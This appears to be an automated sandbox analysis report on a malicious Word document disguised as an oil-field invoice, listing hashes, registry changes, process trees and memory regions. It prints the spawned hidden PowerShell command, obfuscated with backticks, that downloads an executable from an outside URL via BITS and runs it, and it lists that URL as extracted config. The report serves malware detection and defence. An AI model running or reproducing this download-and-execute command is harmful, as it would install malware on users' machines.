Analysis
-
max time kernel
102s -
max time network
95s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14-10-2021 08:09
Behavioral task
behavioral1
Sample
Invoice- 0535254 Oil_Field_4568742.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Invoice- 0535254 Oil_Field_4568742.doc
Resource
win10v20210408
General
-
Target
Invoice- 0535254 Oil_Field_4568742.doc
-
Size
55KB
-
MD5
e70320db1a53b3226e73d2b8124b2073
-
SHA1
119ac671f8030a7395030273931120b6e52b3d4d
-
SHA256
4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1
-
SHA512
c964a9a959a224d938b8251b97fe3a31483d8eca5eeaa7886450e44d048ecc30c52331158865f33e14b03f03cc7ea236ae6f69b7760eb25bb414b829a59f8df6
Malware Config
Extracted
https://secure04sd.my03.com/a/oleApp13.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 1868 1940 cmd.exe WINWORD.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1940 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1312 powershell.exe 1312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1312 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1940 WINWORD.EXE 1940 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 1940 wrote to memory of 1868 1940 WINWORD.EXE cmd.exe PID 1940 wrote to memory of 1868 1940 WINWORD.EXE cmd.exe PID 1940 wrote to memory of 1868 1940 WINWORD.EXE cmd.exe PID 1940 wrote to memory of 1868 1940 WINWORD.EXE cmd.exe PID 1868 wrote to memory of 1312 1868 cmd.exe powershell.exe PID 1868 wrote to memory of 1312 1868 cmd.exe powershell.exe PID 1868 wrote to memory of 1312 1868 cmd.exe powershell.exe PID 1868 wrote to memory of 1312 1868 cmd.exe powershell.exe PID 1940 wrote to memory of 992 1940 WINWORD.EXE splwow64.exe PID 1940 wrote to memory of 992 1940 WINWORD.EXE splwow64.exe PID 1940 wrote to memory of 992 1940 WINWORD.EXE splwow64.exe PID 1940 wrote to memory of 992 1940 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 0535254 Oil_Field_4568742.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Documents\questionpolitics.cmd" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://secure04sd.my03.com/a/oleApp13.e`xe -Destination C:\Users\Public\Documents\happyalmost.e`xe;C:\Users\Public\Documents\happyalmost.e`xe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\questionpolitics.cmdMD5
5f4bcdc965cc9739a817de56d7ca2846
SHA124d45c0d986d4ba7074da5f671d5288626dba3c3
SHA2567a16b7becdfe4e0598f559ab176ac97641ec0030b7da324b7dd2e659b20bec9d
SHA5129694cdb38eba0bccf109fe036aef3067f7d132a747738b1e7284cde76e2e90cd07bf4fce5a588cc3eee9a7ffa0731efc91692232a3e83eaad797068f6803f371
-
memory/992-92-0x000007FEFBB31000-0x000007FEFBB33000-memory.dmpFilesize
8KB
-
memory/992-91-0x0000000000000000-mapping.dmp
-
memory/1312-72-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/1312-76-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/1312-110-0x00000000064F0000-0x00000000064F1000-memory.dmpFilesize
4KB
-
memory/1312-65-0x0000000000000000-mapping.dmp
-
memory/1312-67-0x0000000002170000-0x0000000002171000-memory.dmpFilesize
4KB
-
memory/1312-68-0x0000000004900000-0x0000000004901000-memory.dmpFilesize
4KB
-
memory/1312-69-0x0000000004902000-0x0000000004903000-memory.dmpFilesize
4KB
-
memory/1312-70-0x0000000004940000-0x0000000004941000-memory.dmpFilesize
4KB
-
memory/1312-71-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/1312-109-0x00000000064E0000-0x00000000064E1000-memory.dmpFilesize
4KB
-
memory/1312-75-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1312-95-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/1312-81-0x0000000005680000-0x0000000005681000-memory.dmpFilesize
4KB
-
memory/1312-82-0x00000000062E0000-0x00000000062E1000-memory.dmpFilesize
4KB
-
memory/1312-89-0x00000000057E0000-0x00000000057E1000-memory.dmpFilesize
4KB
-
memory/1312-90-0x0000000006370000-0x0000000006371000-memory.dmpFilesize
4KB
-
memory/1312-93-0x00000000055F0000-0x00000000055F1000-memory.dmpFilesize
4KB
-
memory/1868-63-0x0000000000000000-mapping.dmp
-
memory/1940-60-0x000000006FF11000-0x000000006FF13000-memory.dmpFilesize
8KB
-
memory/1940-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1940-59-0x0000000072491000-0x0000000072494000-memory.dmpFilesize
12KB
-
memory/1940-62-0x0000000075C31000-0x0000000075C33000-memory.dmpFilesize
8KB
-
memory/1940-111-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB